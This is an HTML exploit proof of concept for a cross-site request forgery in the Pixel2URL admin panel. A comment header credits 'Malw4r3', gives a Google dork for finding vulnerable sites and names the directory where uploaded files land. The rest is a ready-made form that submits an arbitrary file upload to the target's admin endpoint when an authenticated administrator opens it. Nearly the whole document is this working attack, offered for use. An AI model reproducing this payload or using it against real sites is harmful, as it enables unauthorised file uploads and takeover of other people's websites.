<!-- ======================================================= !*! Exploit Title : Pixel2URL Upload File (CSRF) !*! Exploit Author : Malw4r3 !*! Email : Malw4r3@yahoo.com !*! Vendor Homepage : http://pixel2url.com/ !*! Date: 12.30.2015 !*! Tested On : Windows [And] Kali !*! Google dork : "Powered By Pixel2URL" !*! Upload in > http://TARGET/admincp/sdata/msecimgs/[LastFile] ======================================================= --> <title>Exploit By Malw4r3</title> <form action="http://TARGET/admincp/addmainsection.php?lng=en" method="post" enctype="multipart/form-data" name="frmnews"> <input hidden="" name="SecName" type="text" value="TEST" class="txtbox3" id="SecName"> <b>Your File (Image):</b><input name="bFile" type="file" class="txtbox3" id="bFile"></br> <input name="button" type="submit" class="btns" id="button" value="Submit">